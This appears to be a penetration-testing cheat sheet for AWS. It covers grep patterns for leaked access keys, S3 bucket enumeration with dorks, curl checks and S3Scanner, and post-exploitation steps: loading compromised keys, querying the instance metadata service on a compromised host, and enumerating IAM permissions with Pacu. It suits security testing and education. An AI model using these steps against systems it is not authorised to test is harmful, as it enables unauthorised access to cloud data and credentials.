Secrets Hunting
If you're hunting for secrets in git repos, you can try some of these commands:
Search for aws keys in bash scripts
find / -name '*.sh' -exec grep -HE "([^A-Z0-9]|^)AKIA[A-Z0-9]{12,}" {} \;
Resource:
https://twitter.com/omespino/status/1242977678329819141?s=20
Search for access keys with grep
Access key:
grep -RP '(?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9])' * 2>/dev/null
Secret access key:
grep -RP '(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])' * 2>/dev/null
Resource:
https://gist.github.com/hsuh/88360eeadb0e8f7136c37fd46a62ee10
S3
Hunting
You can reach S3 buckets via a web interface regardless of whether or not access is permitted. The URL formats are:
https://<bucketname>.s3.amazonaws.com
https://s3.amazonaws.com/<bucketname>
A couple of things worth keeping in mind for creating tooling around hunting for buckets:
- Names must be >= 3 && <= 63 characters long
- Names can contain lowercase letters, numbers and hyphens
- Names consist of labels, which can be separated with periods. Each label must start and end with a lowercase letter or number
- Bucket names can't be formatted as an IP address
Response codes
404 - bucket doesn't exist
403 - bucket exists but you don't have access
200 - bucket exists and is accessible
If a bucket returns a 403, you can still do some things with the S3 API (this does cost money per 1000 requests, so be sparing when hunting for buckets on a large scale).
AWS CLI
It's also worth trying things out with the CLI. It's also important to remember to try reading and writing (sometimes you can do one and not the other).
List files in bucket:
aws s3 ls s3://bucketname
Copy a file to a bucket:
aws s3 cp canary.txt s3://bucketname
Google Dorks
site:s3.amazonaws.com example
site:s3.amazonaws.com example.com
site:s3.amazonaws.com example-com
site:s3.amazonaws.com com.example
site:s3.amazonaws.com com-example
List the size and name of s3 buckets your credentials can access
Be sure to change the region.
#!/bin/bash
aws_profile=('default' 'otherprofile');
#loop AWS profiles
for i in "${aws_profile[@]}"; do
echo "${i}"
buckets=($(aws --profile "${i}" --region us-east-2 s3 ls s3:// --recursive | awk '{print $3}'))
#loop S3 buckets
for j in "${buckets[@]}"; do
echo "${j}"
aws --profile "${i}" --region us-east-2 s3 ls s3://"${j}" --recursive --human-readable --summarize | awk END'{print}'
done
done
Run S3Scanner
git clone git@github.com:sa7mon/S3Scanner.git
cd S3Scanner
pipenv shell
pip install -r requirements.txt
python s3scanner.py buckets_to_test.txt
buckets.txt
should generally look something like this:
a-bucket
b-bucket
Just to make sure it's totally clear what exactly you should put into buckets.txt
; if you were to run a curl command to test if the first bucket was open, you would run something like this:
# if 200, then it's open
curl -s -o /dev/null -w "%{http_code}" https://s3.amazonaws.com/a-bucket
# if 200, then it's open
curl -s -o /dev/null -w "%{http_code}" -L https://a-bucket.s3.amazonaws.com
Do not name your input file to buckets.txt
or this thing will do an infinite loop!
Resources:
https://craighays.com/bug-bounty-hunting-tips-3-kicking-s3-buckets/
https://blog.securitybreached.org/2018/09/24/subdomain-takeover-via-unsecured-s3-bucket/
https://devops.stackexchange.com/questions/2241/view-all-aws-s3-buckets-and-list-each-buckets-storage-used
Post Exploitation
This is a good place to start if you've got credentials or you've compromised a system that's hosted on AWS.
Configure credentials for AWS cli
If you have any existing AWS environment variables set, unset them:
unset {AWS_DEFAULT_REGION,AWS_SECRET_ACCESS_KEY,AWS_ACCESS_KEY_ID}
Add the compromised keys to ~/.aws/credentials
. It should look something like this:
[target_name]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token=AQoDYXdzEJr...<remainder of security token>
Make sure to set the proper region as well in ~/.aws/config
, which you can get using this command on the compromised instance:
curl http://169.254.169.254/latest/dynamic/instance-identity/document
An alternative with wget
:
wget -O - -q http://169.254.169.254/latest/dynamic/instance-identity/document
It should look something like this:
[target_name]
region = target_region_here
output = json
Set the profile:
export AWS_PROFILE=target_name
Get UserID
aws sts get-caller-identity --output json | jq -r '.UserId'
Test IAM for priv esc potential
ScoutSuite
https://github.com/nccgroup/ScoutSuite will generate an HTML report outlining various issues that exist in the configuration for a given account.
Install:
git clone git@github.com:nccgroup/ScoutSuite.git
cd ScoutSuite
pipenv --python 3
pipenv shell
pip install -r requirements.txt
Run:
python scout.py aws --profile $PROFILE_NAME
Resource: https://kalilinuxtutorials.com/scout-suite-multi-cloud-security-auditing-tool/
Pacu
Set the keys
This will use the keys in ~/.aws/credentials
from the default region:
import_keys default
Set the region
This will set the region to us-east-2:
set_regions us-east-2
Verify credentials
whoami
List modules
ls
Run module
This will run a module to enumerate permissions the current account has:
run iam__enum_permissions